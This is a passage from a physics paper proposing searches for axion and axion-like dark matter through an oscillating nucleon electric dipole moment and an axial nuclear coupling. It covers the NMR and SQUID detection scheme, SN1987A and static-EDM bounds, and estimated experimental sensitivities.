10^{16}$ GeV (the grand unified scale) would be allowed as long as the initial displacement was $\sim \mathcal{O}\left(1 \% \right)$.
As argued in [@Linde:1987bx], inflationary cosmology can provide a natural mechanism that would allow a range of initial values for the axion field. As long as the scale of inflation is lower than $f_a$, the pre-inflationary space-time can have a generic inhomogeneous distribution of the axion field. Inflation can make any small part of this initial space-time into our Hubble patch, allowing for a uniform axion field value throughout our patch. The field value in our Hubble patch would be equal to the local field value of the pre-inflationary space-time that inflated to become our patch. Since a range of initial field values are scanned in the pre-inflationary space-time, the axion field can take any value in our patch. It is difficult to estimate the likelihood of any particular value in our patch since inflationary space-times do not possess a natural measure [@Linde:2007nm].
For any $f_a \gtrapprox 10^{9}$ GeV, a cosmologically viable axion field exists as long as the initial field value is appropriately small ($\propto \frac{1}{\sqrt{f_a}}$). In the canonical axion window $f_a \sim 10^{12}$ GeV, it is assumed that it is natural for the axion field to have a large $\mathcal{O}\left(1\right)$ initial displacement, forcing the scale $f_a$ to be much lighter than the fundamental scales of particle physics. But, having $f_a$ much lighter than these fundamental scales creates another hierarchy problem. The constraint [@Dine:1982ah; @Preskill:1982cy] on the cosmological abundance of the axion requires one small number - this could be the initial value of the axion field or the scale $f_a$ (measured in terms of the fundamental scales) or any combination of these. Given our ignorance of the ultraviolet structures of particle physics and the difficulties of obtaining well defined measures on initial conditions in inflationary cosmology, there is no strong reason to prefer any particular value of $f_a$.
It should be noted that the details of the cosmological bound discussed above are specific to the QCD axion since this bound depends upon the details of the mass generation mechanism. For a general ALP, depending upon the mass generation mechanism, similar bounds could be placed. However, much like the case of the axion, bounds based on the cosmological abundance of ALPs are subject to similar uncertainties.
It is thus important to search for ALPs over their entire range of parameter space, just above $f_a \gtrapprox 10^{9}$ GeV. The axion can constitute a significant fraction of the dark matter when $f_a \gtrapprox 10^{11}$ GeV, while for a generic ALP, the exact region where it can be the dark matter depends upon its mass generation mechanism. The phenomenology of cosmic ALP dark matter is insensitive to the details of the mechanism responsible for generating its mass.
The classical field that describes ALP dark matter can be expressed as $a_0 \cos \left(m_a t\right)$. The amplitude $a_0$ is obtained by setting the energy density in the field $\frac{1}{2} m_a^2 a_0^2$ equal to the local dark matter density $\rho_{\text{dm}}\sim 0.3 \, \frac{\text{GeV}}{\text{cm}^3}$. This energy density can be understood as the result of the oscillations of the classical dark matter ALP field with amplitude $a_0$ and frequency $m_a$. The temporal coherence of these oscillations in an experiment is limited by motion through the spatial gradients of the ALP field. The gradients are set by the de Broglie wavelength of the ALP $\frac{1}{m_a v} \sim 1000 \, \text{km} \, \left(\frac{\text{MHz}}{m_a}\right)$, where $v \sim 10^{-3}$ is the galactic virial velocity of the ALP dark matter. Since the velocity between the experiment and the dark matter is also $v$, the time $\tau_a$ over which the ALP will interact coherently is at least $\tau_a \sim \frac{2 \pi}{m_a v^2} \sim 10^6 \, \frac{2 \pi}{m_a} \sim 1 \,s \, \left(\frac{\text{MHz}}{m_a}\right)$. In other words, the ALP’s frequency $m_a$ is broadened by its kinetic energy $m_a v^2$. Lighter ALPs, corresponding to larger values of $f_a$, are coherent for longer. For the rest of this paper, we will assume that ALPs constitute a significant fraction of dark matter and propose techniques utilizing their classical nature to search for them. For another proposal using the fact that the axion acts like a classical field causing an oscillating $\theta$ angle, but using a different axion coupling from us, see for example [@Hong:1991fp].
Current Searches {#sec: current searches}
Essentially all experiments attempting to directly detect axions or ALPs use the ALP coupling to electromagnetic fields $$\label{eqn: axion photon coupling}
\mathcal{L} \ni g_{a\gamma\gamma} a F \tilde{F}$$ where $F_{\mu \nu}$ is the field strength of electromagnetism and $a$ is the ALP field. Such fields are easily manipulatable in the laboratory. This has allowed a wide range of tests from microwave cavity experiments such as ADMX, to helioscopes such as CAST, to light-through-walls experiments such as ALPS [@Asztalos:2009yp; @Irastorza:2006gs; @Ehret:2009sq]. There are also many astrophysical observations which limit this coupling of axions and ALPs to photons [@Raffelt:2006cw]. A summary of all current constraints on this parameter space is reproduced in Fig. \[Fig:photon\] from [@Ringwald:2012cu] (see also [@Hewett:2012ns; @Arias:2012az]). Although this space is well-covered by experiments and astrophysical bounds at higher mass and coupling $g_{a\gamma\gamma}$, it is challenging to search in the low mass and coupling region. A large piece of the parameter space for light ALPs is currently not reachable. Indeed, most of the masses for which the QCD axion could be dark matter are not reachable by current experiments.
![ \[Fig:photon\] Reproduced with permission from Fig. 2 of A. Ringwald [@Ringwald:2012hr], this figure is adapted from [@Hewett:2012ns; @Arias:2012az; @Cadamuro:2011fd] (see also [@Ringwald:2012cu]). ALP parameter space in axion-photon coupling (as in Eq. ) vs mass of ALP. The QCD axion is the yellow band. The width of the yellow band gives an indication of the model-dependence in this coupling, though the coupling can even be tuned to zero.](axion-photonplot.pdf){width="5"}
For the QCD axion there is a constrained set of predictions for $g_{a\gamma\gamma}$ as a function of the axion decay constant $f_a$, $g_{a\gamma\gamma} \propto f_a^{-1}$. Thus the QCD likely lies in the yellow band in Fig. \[Fig:photon\]. It may be the dark matter over a wide range of masses $\text{meV} \lesssim m_a \lesssim 10^{-12}$ eV, with axion decay constant anywhere in the range $f_a \gtrsim 10^{10}$ GeV all the way up to the Planck scale $\sim 10^{19}$ GeV. The only experiment which can currently reach the QCD axion in this range is ADMX and it cannot probe the region of high $f_a \gtrsim 10^{13}$ GeV, or $m_a \lesssim 10^{-6}$ eV. Coming upgrades to ADMX, such as ADMX-HF, may probe higher masses (lower $f_a$). However, it is very challenging for microwave cavity searches to get to higher $f_a$ because these experiments search for axion to photon conversion through the coupling in Eq. . The amplitude for this process necessarily goes as the square of the coupling $\propto f_a^2$. Further, the cavity must be on resonance with the axion mass (frequency) in order to enhance the signal. This requires the cavity to be approximately the size of the axion wavelength $\sim m_a^{-1}$. For GUT scale axions $f_a \sim 10^{16}$ GeV gives $m_a^{-1} \sim 300$ m, which makes for a rather large cavity. If the cavity size cannot be increased with the wavelength, then the sensitivity of the experiment will fall off even more rapidly with increasing $f_a$. While microwave cavities make excellent axion detectors for the lower $f_a$, they are many orders of magnitude away from detecting axions with higher $f_a$. Similarly, other proposals using the coupling to electromagnetism in Eq. , e.g. the interesting, recent proposal of using a dish detector [@Horns:2012jf], may work at lower $f_a \lesssim 10^{13}$ GeV, but cannot reach higher $f_a$.
Given how well-motivated axion dark matter is, it is important not to miss a such a large piece of its parameter space. It is therefore crucial to design experiments that can detect axions or ALPs with masses below $\mu$eV. This is clearly challenging using the coupling in Eq. .
Axion-EDM Coupling {#Sec: EDM}
There are two general problems to using the axion-photon coupling Eq. for detection of light, weakly-coupled axions. First, all experiments are measuring rates for axion to photon conversion so they go as amplitude squared $\propto g_{a\gamma\gamma}^2$. In fact, in the case of light-through-walls experiments since a photon must convert to an axion and then convert back to a photon the rate goes as $g_{a\gamma\gamma}^4$. Second, the operator in Eq. usually suppresses the signal in a possible experiment by the ratio of the size of the experiment over the wavelength of the axion (often squared). This arises because $F \tilde{F}$ is a total derivative and therefore the operator in Eq. can be thought of as having a derivative on the axion field. For high mass axions this is not a problem, microwave cavities can easily be the same size as the axion wavelength. But for low mass axions this is a large suppression for any laboratory sized experiment.
A New Operator for Axion Detection
To detect low mass axions or ALPs we must avoid these problems. We therefore propose using a different coupling instead of the one in Eq. . The QCD axion solves the strong CP problem, the problem that a nucleon electric dipole moment (EDM) would be generated by the $\theta$ parameter of QCD. This parameter arises in the Standard Model lagrangian term $\theta G \tilde{G}$, where $G$ is the QCD field strength. The QCD axion solves this problem essentially by turning $\theta$ into the dynamical axion field. Thus the QCD axion is defined by its coupling $\propto \frac{a}{f_a} G \tilde{G}$. This means the axion gives an effective $\theta$ angle. This will then give rise to an EDM for nucleons sourced by the axion. Because the axion is a dynamical field, this EDM will change in time, giving rise to unique signals. We propose to search for this time-varying EDM as a new way to detect axions or ALPs.
This EDM can be expressed as the operator coupling the axion to nucleons $N$: $$\label{eqn: axion EDM coupling}
\mathcal{L} \ni -\frac{i}{2} g_d \, a \, \bar{N} \sigma_{\mu \nu} \gamma_5 N F^{\mu \nu}.$$ where $g_d$ is a coupling constant we introduce. In general a new light particle or ALP could have a coupling like this as well. The nucleon EDM generated by this operator is $$\label{eqn: nucleon EDM}
d_n = g_d a$$ where $a$ is the value of the local axion or ALP field at the position of the nucleus. Thus, any nucleon in the axion or ALP dark matter will acquire an EDM proportional to the dark matter field. Note that the operator in Eq. is a non-derivative coupling for the ALP so it naturally avoids the wavelength suppression discussed above for low mass axions or ALPs.
For the QCD axion the nucleon EDM created by its QCD coupling is determined in terms of the axion decay constant $f_a$: $$\label{eqn: qcd axion nucleon EDM}
d_n^\text{QCD} \approx 2.4 \times 10^{-16} \frac{a}{f_a} e \cdot {\text{cm}}$$ with about a 40% uncertainty [@Pospelov:1999ha]. Thus, for the QCD axion our coupling $g_d$ is determined by the axion decay constant $f_a$ as $$\label{Eqn: QCD axion gd}
g_d^\text{QCD} \approx \frac{2.4 \times 10^{-16}}{f_a} \, e \cdot {\text{cm}}\approx 5.9 \times 10^{-10} \left( \frac{m_a}{\text{eV}} \right) {\text{GeV}}^{-2}$$ where $m_a$ is the axion mass from Eq. . For an ALP of course, the coupling $g_d$ is in general arbitrary, independent of the mass of the ALP.
Note that one useful feature of searching for this EDM is that it is naturally a measurement of an amplitude (or phase), not a rate. Thus the signal in an experiment will only be proportional to one power of $g_d$, or one power of $\frac{1}{f_a}$ for the QCD axion. This is in contrast to all other experiments which are measuring rates and whose signals therefore are $\propto g_d^2$ or $\propto \frac{1}{f_a^2}$. Measuring an amplitude and not a rate makes it much easier to push the sensitivity up to high $f_a$ (low axion couplings).
Further, the actual size of the EDM is set by the product $g_d a$, where $a$ is the local dark matter, axion or ALP, field. As discussed in Section \[Sec:Overview\] this is approximately $a \approx a_0 \cos \left( m_a t \right)$. The amplitude of this field, $a_0$, is known if we require that this field makes up (all of) the local dark matter density $$\label{eqn: dm abundance}
\rho_\text{DM} = \frac{1}{2} m_a^2 a_0^2 \approx 0.3 \frac{{\text{GeV}}}{{\text{cm}}^3}$$ since the field $a$ is essentially a free scalar field with this mass term as the leading term in its potential. This then determines the nucleon EDM generated by ALP dark matter from Eqs. and to be $$\label{eqn: ALP EDM}
d_n = g_d \frac{\sqrt{2 \, \rho_\text{DM}}}{m_a} \cos \left( m_a t \right) \approx \left( 1.4 \times 10^{-25} \, e \cdot {\text{cm}}\right) \left( \frac{\text{eV} }{m_a} \right) \left( g_d \, {\text{GeV}}^2 \right) \cos \left( m_a t \right)$$
For the QCD axion, since the axion mass from Eq. scales as $m_a \propto \frac{1}{f_a}$, taking the axion to be all of the dark matter fixes the effective $\theta$ angle of the axion to be independent of $f_a$: $$\label{qcd axion theta}
\frac{a_0}{f_a} \approx 3.6 \times 10^{-19}$$ So for the QCD axion dark matter, the nucleon EDM it induces from Eq. , is actually independent of $f_a$ $$\label{eqn: qcd axion edm}
d_n^\text{QCD} \approx \left( 9 \times 10^{-35} \, e \cdot {\text{cm}}\right) \cos \left( m_a t \right).$$ Thus we have found a physical effect that does not decouple as $f_a$ increases. This useful fact allows experiments searching for this EDM to probe high $f_a$ axions.
Note that the EDM induced by the axion from Eq. is small. Of course the EDM induced by a general ALP, Eq. , is arbitrary. For the QCD axion though, the EDM is about eight orders of magnitude smaller than the current bound on the static nucleon EDM, though these may improve in the future. However the reason to believe that this EDM may be detectable is that it is not a static EDM. The axion or ALP field oscillates with a frequency approximately equal to its mass Eq. . Thus the nucleon EDM from Eq. also oscillates with this frequency. This allows a resonant enhancement of the signal in an experiment (similar to ADMX) which can be many orders of magnitude. Further, backgrounds for an oscillating signal are very different, and usually much more controllable, than backgrounds for a static signal. The frequency of the oscillation is set by high energy physics, independent of anything in the laboratory setup.
Thus every nucleon bathed in axion (or this type of ALP) dark matter has an oscillating EDM with frequency set by the mass of the axion field. Further, this oscillation will be in phase for all nucleons within the axion dark matter coherence length $\sim \frac{1}{m_a v}$, see Section \[Sec:Overview\]. One immediate idea is to search for the electromagnetic radiation given off by all these nuclear “antennas." We could not find a plausibly observable signal of this radiation, using either laboratory or astrophysical (e.g. neutron star) sources. One problem is that the radiation rate is proportional to the square of the EDM, and additionally to the small frequency or mass of the axion or ALP.
We have already proposed one idea using interferometry of cold molecules to detect axion dark matter using the nuclear EDM [@Graham:2011qk]. We also believe that experiments based on nuclear magnetic resonance (NMR) techniques to measure spin precession may allow detection of ALPs and even the QCD axion over many orders of magnitude in parameter space [@NMR; @paper] (see Figure 2 of [@NMR; @paper] for sensitivity estimates).
A New ALP Parameter Space
Using the EDM coupling in Eq. naturally suggests a new parameter space in which to search for axion-like particles. The EDM coupling is naturally generated for the QCD axion. Of course, the scalar field $a$ in Eq. does not have to be the QCD axion. If not, it would be a type of ALP. Most considerations of ALPs have focused on fields that couple to electromagnetism through the coupling in Eq. . However there is no reason that an ALP has to couple only, or at all, through the electromagnetic coupling. The space of ALPs that have EDM couplings as in Eq. is a new parameter space that is worth exploring since this coupling motivates new experimental signatures and appears promising for axion detection. Figure \[Fig:EDM\] shows the parameter space for an ALP in the space of the EDM coupling $g_d$ in Eq. versus the mass of the ALP.
![ \[Fig:EDM\] ALP parameter space in EDM coupling Eq. vs mass of ALP. The green region is excluded by excess cooling in SN1987A. The blue regions are excluded by the best static nucleon EDM experiments. The purple band is the QCD axion region, with dark purple showing the most theoretically-motivated region for QCD axion dark matter. The width of the band shows the uncertainty in the calculation of the axion-induced EDM and the axion mass. The ADMX region shows the part of QCD axion parameter space which has been covered (darker blue) [@Asztalos:2009yp] or will be covered in the near future (lighter blue) [@ADMXwebpage; @snowdarktalk] by ADMX. For the static EDM and ADMX bounds we assume that the ALP makes up all of the dark matter. See also Figure 2 of [@NMR; @paper] for sensitivity of the proposed NMR experiment.](dipoleplot.pdf){width="6"}
The QCD axion may lie anywhere on the purple line in Figure \[Fig:EDM\]. It lies on a line because it has only one free parameter, $f_a$, which determines its mass and $g_d$ as in Eqs. and . The width of the QCD axion line shows an estimate of the theoretical uncertainty in the calculation of these quantities, as described above. The darker purple section of the line shows where the QCD axion may make up the dark matter. For values of $m_a \gtrsim$ meV the QCD axion cannot have enough abundance to make up all of the dark matter, as discussed in Section \[Sec:Overview\], though it may be a subdominant component. The lower edge of the dark purple region, where $m_a \approx 5 \times 10^{-13}$ eV, is where the axion decay constant is around the Planck scale, $f_a = M_\text{pl} \approx 1.2 \times 10^{19}$ GeV. It is not clear if it is possible to make models of the QCD axion with masses below this scale, since that would require $f_a > M_\text{pl}$. For that reason we keep this area light purple. It is certainly worth searching for such axions though, since although it is not obvious how to make a model of such an axion without a full understanding of quantum gravity, it may well be possible.
We show the ADMX constraints as the blue region in Figure \[Fig:EDM\]. Since ADMX searches for the axion electromagnetic coupling Eq. these constraints cannot properly be put on this figure for the QCD or EDM coupling. But ADMX can constrain most QCD axion models, where the coupling to photons is related to the coupling to gluons. So we show the ADMX constraints in Figure \[Fig:EDM\] as constraints just on the QCD axion parameter space. The darker blue represents the current bounds from ADMX [@Asztalos:2009yp] while the lighter blue represents the region ADMX will cover in the near future [@ADMXwebpage; @snowdarktalk].
The constraint from SN1987A arises from excess cooling caused by axion emission. This constraint usually arises from the other axion-nucleon coupling Eqn. as in [@Raffelt:2006cw]. We adapted it to the higher dimension EDM operator Eqn. by calculating the axion emission rate from the SN using the process $N + \gamma \to N + a$. We approximate this cross section as $\sigma v \approx g_d^2 T^2$ where $T \approx 30$ MeV is the temperature of the SN. As an approximation we assume the axion is produced with energy equal to the average photon energy in the SN $\approx \frac{\pi^4}{30 \zeta(3)} T \approx 2.7 \, T$. The energy lose rate per unit volume is then $\approx 2.7 \, T n_\gamma n_N \sigma v$, where $n_N \approx \frac{1.8 \times 10^{38}}{\text{cm}^3}$ is the number density of nucleons and $n_\gamma \approx \frac{2 \zeta(3)}{\pi^2} T^3$ is the number density of photons in the supernova. Dividing this by the mass density of the supernova $\rho \approx 3 \times 10^{14} \frac{\text{g}}{{\text{cm}}^3}$ gives the cooling rate per unit mass. This cooling rate is then compared to the bound $10^{19} \, \text{erg} \, \text{g}^{-1} \, \text{s}^{-1}$ from [@Raffelt:2006cw]. This gives a bound on the EDM coupling $g_d \lesssim 4 \times 10^{-9} \, {\text{GeV}}^{-2}$. This bound is shown as the green region in Figure \[Fig:EDM\]. Of course this calculation is only a rough approximation, but it is good enough for our purposes since the parameter space we are interested in extends many orders of magnitude below this bound. We leave a more precise calculation for future work.
The experiments searching for (static) nuclear EDMs have drastically reduced sensitivity to an oscillating EDM of the type we are considering. These experiments gain sensitivity by integrating for relatively long periods of time compared to the period of the oscillating EDM we are considering, Eq. . Since this oscillating EDM has an average value of zero these static EDM experiments are not well-suited to searching for this signal of an ALP. The limits set by the static EDM experiments are shown in the dark blue region of Figure \[Fig:EDM\] [@Baker:2006ts; @Harris:1999jx]. These experiments have not done a specific search for an oscillating EDM so we calculated an approximate limit using their limits on the static nuclear EDM as follows. We assume these experiments gain sensitivity linearly in time over their shot time. They measure the total precession of the neutron spin when exposed to an electric field for a shot time, which is $t_{\text{shot}}= 130$ s for [@Baker:2006ts]. However since the oscillating EDM averages to zero, only the last fraction of a period of oscillation will cause a net precession. Thus these experiments lose a factor of $\sim t_{\text{shot}}m_a$ in sensitivity to an oscillating EDM. Further, the signal of this oscillating EDM will be stochastic from shot to shot and so we assume roughly that the sensitivity will not improve with the number of shots. We assume this means the static EDM experiments lose another factor of $\sim \sqrt{N_{\text{shot}}}$ in their sensitivity. The number of shots was $N_{\text{shot}}= 221600$ in [@Baker:2006ts]. So finally we estimate the limit these experiments set on the amplitude of an oscillating EDM is $\sim d_N^{\text{static}}\left( t_{\text{shot}}m_a \right) \sqrt{N_{\text{shot}}}$ where $d_N^{\text{static}}= 2.9 \times 10^{-26} \, \text{e} \cdot {\text{cm}}$ is the limit they set on the static nucleon EDM. Under the assumption that the ALP makes up all of the dark matter we can translate this to a bound on the coupling $g_d$ using Eq. . This gives a bound of $g_d \lesssim 1.8 \times 10^{19} \left( \frac{m_a}{{\text{eV}}} \right)^2 {\text{GeV}}^{-2}$, as shown in Figure \[Fig:EDM\]. This bound is only a rough approximation but it is good enough for our purpose since it is a very weak bound on these ALPs. Ideally the experiments themselves would reanalyze their data to directly search for an oscillating EDM. Since these experiments are looking for a static nucleon EDM they are simply not designed appropriately to look for the oscillating EDM signal we are discussing.
The EDM coupling in Eq. is an interesting and useful one to consider for axion or ALP detection partially because it is a non-derivative coupling. For the QCD axion this coupling arises completely naturally. For an ALP this coupling may also be natural. However it can induce a mass for the ALP through a two-loop diagram. Thus the most natural part of such ALP parameter space, Figure \[Fig:EDM\], is either below the QCD axion line or above it and within several orders of it. ALP parameter space that is many orders of magnitude above the QCD axion line may become tuned, though at some point of course is ruled out by SN1987A anyway. Of course, this concern applies to the scalar ALP model we have considered, other fields or models could change this. Having ALP dark matter with the coupling we are considering changes the status of the nucleon EDM from a fundamental constant of nature to a parameter dependent on the local field value. Thus we see that the nucleon EDM may be expected to change in time (and space), likely oscillating at high frequencies $\sim$ kHz to GHz. It is thus important to consider the limits that existing experiments put on the parameter space in Figure \[Fig:EDM\]. Further, this parameter space has not been considered before. Therefore it is also important to design experiments which are optimized to search for this signal. Beyond the cold molecule [@Graham:2011qk] and NMR techniques [@NMR; @paper] that we have considered there could be many possibilities for other experiments, for example using proton storage rings [@Semertzidis:2011qv; @Orlov:2006su; @Semertzidis:2003iq; @yannis].
Axial Nuclear Moment {#Sec: axial nuclear}
The third operator in gives rise to the coupling
\mathcal{L} \supset g_\text{aNN} \left( \partial_\mu a \right) \bar{N} \gamma^\mu \gamma_5 N$$
between the ALP and the axial nuclear current. For the QCD axion, this coupling usually exists to both protons and neutrons and is approximately $g_\text{aNN} \sim \frac{1}{f_a}$. Current bounds on this operator arise from two sources. First, this operator allows an accelerated nucleon to lose energy through ALP emission. These emissive processes are constrained by observations of the cooling rates of supernova, imposing an upper bound on $g_{aNN} \lessapprox 10^{-9} \text{ GeV}^{-1}$ [@Raffelt:2006cw]. Second, this operator leads to a force between nucleons through the exchange of ALPs. This force is spin dependent with a range $\sim m_a^{-1}$ [@Moody:1984ba]. Such spin-spin interactions have been searched for using a variety of spin polarized targets, but the limits on $g_{aNN}$ from them [@Vasilakis:2008yn] are weaker than the constraints from supernova emission [@Raffelt:2006cw; @Engel:1990zd] (see Fig. \[Fig:Nucleon\]).
The above effects do not require the presence of a background ALP field. In the presence of such a field, for example as ALP dark matter, the non-relativistic limit of this operator leads to the following term in the nucleon Hamiltonian $$H_N \supset g_{aNN} \vec{\nabla} a.\vec{\sigma_N}$$ where $\sigma_N$ is the nucleon spin operator. Much like a spin precessing around a background magnetic field, this coupling causes spin precession of a nucleon around the local direction of the ALP momentum $\vec{\nabla} a$.
The motion of the Earth through the galaxy leads to a relative velocity between it and the dark matter. As long as the nucleon spin is not aligned with this velocity, the spin will precess about this ALP dark matter “wind". Since the magnitude of this relative velocity is the galactic virial velocity $v \sim 10^{-3} c$, the ALP has a momentum of $\vec{\nabla} a \sim 10^{-3} \, \partial_0 a $. To leading order the ALP dark matter field is simply a free scalar field with low momentum which is oscillating in its potential so it is approximately $a \approx a_0 \cos \left( m_a t \right)$. Thus $\partial_0 a$ has magnitude $a_ 0 m_a$ and oscillates with frequency $m_a$. The effective coupling in the nucleon Hamiltonian is $$\label{eqn: nucleon precession rate from gann}
H_N \supset g_{\text{aNN}} \, m_a a_0 \cos \left(m_a t\right) \, \vec{v} .\vec{\sigma_{N}}$$ The amplitude $a_0$ of the ALP field is constrained by the requirement that the energy density $\frac{1}{2} m_a^2 a_0^2$ in the ALP oscillations not exceed the local dark matter density $\rho_\text{DM} \sim 0.3 \, \frac{{\text{GeV}}}{{\text{cm}}^3}$. Hence, the maximum size of this perturbation is $$\label{eqn: numbers for nucleon precession rate from gann}
\Delta E \sim g_\text{aNN} \, \sqrt{\rho_{\text{DM}}} \, v \sim 3 \times 10^{-9} \text{ s}^{-1} \, \left(\frac{g_{aNN}}{ 10^{-9} \text{ GeV}^{-1}}\right) \left(\sqrt{\frac{\rho_{\text{DM}}}{0.3 \, \frac{\text{GeV}}{\text{cm}^3}}}\right)$$ oscillating at a frequency equal to the ALP mass $m_a \sim$ kHz - GHz. The expected coherence time for this oscillation is set by the ALP coherence time $\tau_a \sim \frac{1}{m_a v^2} \sim 1 \text{ s} \, \left(\frac{\text{MHz}}{m_a}\right)$, leading to a signal bandwidth $\sim 10^{-6} m_a$.
A Detection Strategy {#subsec: det strategy}
The detection of this small but time varying energy shift requires the development of new experimental techniques. While there may be many experimental avenues that could be pursued, we highlight the approach proposed in [@NMR; @paper] utilizing NMR techniques. In this approach, a sample of nuclear spin polarized material is placed with the polarization chosen along a direction that is not collinear to the relative velocity $\vec{v}$ between the Earth and the dark matter, as in Fig. \[Fig:setup\]. An axial nuclear moment in the presence of a dark matter ALP field will cause the spins to precess around this relative velocity. This precession changes the magnetization of the material and can be measured using precision magnetometers such as SQUIDs or SERFs.
![ \[Fig:setup\] Geometry of the experiment, adapted from [@NMR; @paper]. The applied magnetic field $\vec{B}_\text{ext}$ is collinear with the sample magnetization $\vec{M}$. The relative velocity $\vec{v}$ between the sample and the dark matter ALP field is in any direction that is not collinear with $\vec{M}$. The SQUID pickup loop is arranged to measure the transverse magnetization of the sample.](setup.pdf){width="3.5"}
More specifically, the procedure is to polarize the nuclear spins of a sample of material in an external magnetic (${\vec{B}_\text{ext}}$) to achieve a net magnetization. When this net magnetization is not collinear with the dark matter velocity, the spins will precess around this relative velocity. Once they are no longer aligned with the external magnetic field, they will precess around both the relative velocity and this magnetic field. Equivalently, the nuclear spins precess around the relative velocity as seen in a rotating frame in which the magnetic field is eliminated. This results (as seen in the lab frame) in a magnetization at an angle to the magnetic field, which precesses around this field with the Larmor frequency. This gives rise to a transverse magnetization, which can be measured with a magnetometer such as a superconducting quantum interference device (SQUID) with a pickup loop oriented as shown in Fig. \[Fig:setup\]. The transverse magnetization rotates at the Larmor frequency set by the external magnetic field. When the ALP oscillation frequency is different from the Larmor frequency, no measurable transverse magnetization ensues. However, when the two frequencies coincide, there occurs a resonance akin to that in the usual NMR, where the spins precess around a transverse axis rotating at the Larmor frequency [@BudkerBook]. This effect enhances the precessing transverse magnetization that can be detected with the SQUID magnetometer. The magnitude of the external magnetic field (${B_\text{ext}}$) is swept to search for a resonance. At time $t=0$ the spins are prepared along ${\vec{B}_\text{ext}}$, then the magnitude of the transverse magnetization is given by $$\label{eqn: magnetization signal}
M(t) \approx n p \mu \, \left(g_{\text{aNN}} \sqrt{2 \, \rho_{\text{DM}}} v\right) \, \frac{\sin \left( \left( 2 \mu {B_\text{ext}}- m_a \right) t \right)}{2 \mu {B_\text{ext}}- m_a} \sin \left( 2 \mu {B_\text{ext}}t \right),$$ where $n$ is the number density of nuclear spins, $p$ is the polarization, and $\mu$ is the nuclear magnetic dipole moment. The resonant enhancement occurs when $2 \mu {B_\text{ext}}\approx m_a$. Taking $n \sim \frac{10^{22}}{\text{cm}^3}$, $p \sim \mathcal{O}\left(1\right)$, $\mu \sim \mu_N$ (the nuclear Bohr magneton) and interrogation time $ t \sim \tau_a \sim \frac{10^{6}}{m_a}$ (the ALP coherence time), we get $$M \approx 2 \times 10^{-14} \, \text{T} \, \left(\frac{g_{\text{aNN}}}{10^{-10} \, \text{GeV}^{-1}}\right) \, \left(\frac{\text{MHz}}{m_a}\right)$$ This magnetic field is above the sensitivity of modern SQUID and atomic SERF magnetometers that typically have sensitivities $\sim 10^{-16} \frac{\text{T}}{\sqrt{\text{Hz}}}$.
The axial nuclear moment oscillates at a frequency set by particle physics, independent of the experimental setup. This distinguishes the signal from many possible backgrounds. For example, control over noise sources is only required over the signal’s relatively high frequency range (kHz - MHz) and narrow bandwidth ($\sim 10^{-6} \, m_a$). Further, though the induced axial nuclear moment is small, its oscillation at laboratory frequencies enables resonant schemes that boost the signal significantly.
This idea is based on and very similar to the one proposed in [@NMR; @paper] to detect the time varying EDM induced by the dark matter axion. However, in this case, since we are not searching for an EDM, we do not need a material with a large Schiff moment nor do we need to expose it to significant electric fields. The techniques described in [@NMR; @paper] to achieve large nuclear polarizations and quality factors for the NMR resonance can also be employed in this case. Further, noise sources such as the intrinsic magnetization noise of the sample and strategies to mitigate them should also be similar to the discussions of [@NMR; @paper].
![ \[Fig:Nucleon\] ALP parameter space in pseudoscalar coupling of axion to nucleons Eqn. vs mass of ALP. The purple line is the region in which the QCD axion may lie. The width of the purple band gives an approximation to the axion model-dependence in this coupling. The darker purple portion of the line shows the region in which the QCD axion could be all of the dark matter and have $f_a < M_\text{pl}$ as in Figure \[Fig:EDM\]. The green region is excluded by SN1987A from [@Raffelt:2006cw]. The blue region is excluded by searches for new spin dependent forces between nuclei [@Vasilakis:2008yn]. The red line is the preliminary sensitivity of an NMR style experiment using Xe, the blue line is the sensitivity using $^3\text{He}$. The dashed lines show the limit from magnetization noise for each sample. These lines assume the parameters in Table \[Tab: experiments\]. The ADMX region shows the part of QCD axion parameter space which has been covered (darker blue) [@Asztalos:2009yp] or will be covered in the near future (lighter blue) [@ADMXwebpage; @snowdarktalk] by ADMX.](nucleonplot.pdf){width="6"}
Figure \[Fig:Nucleon\] shows constraints on $g_\text{aNN}$ and the potential sensitivity of our proposals. The width of the line shows axion model-dependence in the axion-nucleon coupling. The solid lines are preliminary sensitivity curves with the sensitivity limited by magnetometer noise. Both lines assume samples of volume $\left(10 \text{ cm}\right)^3$ with 100 percent nuclear polarization. Other sample parameters are described in Table \[Tab: experiments\]. The dashed lines show the limits from sample magnetization noise, so where they are higher than the corresponding solid line, they are the limit on sensitivity. The solid curves are cutoff at high frequencies by the requirement that the Larmor frequency be achievable with the assumed maximum magnetic field.
---- --------- ------------------------------------------------ ----------------- ------- -------- ----------------------------------------------
Element Density Magnetic Moment $T_2$ Max. B Magnetometer
($n$) ($\mu$) Sensitivity
1. Xe $1.3 \times 10^{22} \frac{1}{{\text{cm}}^{3}}$ $0.35 \, \mu_N$ 100 10 T $10^{-16} \frac{\text{T}}{\sqrt{\text{Hz}}}$
2. $^3$He $2.8 \times 10^{22} \frac{1}{{\text{cm}}^{3}}$ $2.12 \, \mu_N$ 100 20 T $10^{-17} \frac{\text{T}}{\sqrt{\text{Hz}}}$
---- --------- ------------------------------------------------ ----------------- ------- -------- ----------------------------------------------
: \[Tab: experiments\] The parameters used for the sensitivity curves shown in Figure \[Fig:Nucleon\]. The first row corresponds to the upper (red) lines in the figure while the second row is the lower (blue) lines. For the Xe experiment we used the average magnetic moment from the naturally occurring abundances of $^{129}$Xe and $^{131}$Xe. The sixth column shows the maximum magnetic field that is assumed, which is relevant only for setting the upper frequency limit on the curves. The last column shows the assumed magnetometer sensitivity.
Note that there are many ways to verify a positive signal in such an experiment, the same ways as described in [@NMR; @paper]. If a positive signal is found, the scan can be stopped and that particular frequency can be explored for much more time than was needed to observe it in the scanning mode. Thus one can effectively make many measurements of the dark matter signal. This has several interesting consequences. In particular, the signal from operator of Eqn. is proportional to the spatial derivative of the axion field, i.e. the local axion velocity. This is unlike the case for the EDM operator, Eqn. (our NMR proposal of [@NMR; @paper]) or the photon coupling Eqn. (used in ADMX). Hence, if the ALP signal can be observed through this operator, Eqn. , we will actually have a directional dark matter detector. One could observe simultaneously with 3 different samples with perpendicular magnetization directions (or just vary the magnetization direction using one sample). This would give us the local axion velocity. Within the axion coherence length, the wavelength $\sim \frac{1}{m_a v}$, all experiments must agree on this measured direction of the axion velocity. So this is another check on a positive signal. But it also gives much more information since it tells us about the velocity structure of the dark matter. At any one instant of time the local velocity may appear random and changes on a timescale of order the axion coherence time $\tau_a \sim \frac{1}{m_a v^2}$. However, if the signal is folded on a yearly period or a daily period, the average velocity should modulate exactly with the Earth’s velocity around the sun or rotational velocity around its axis respectively. This would be yet 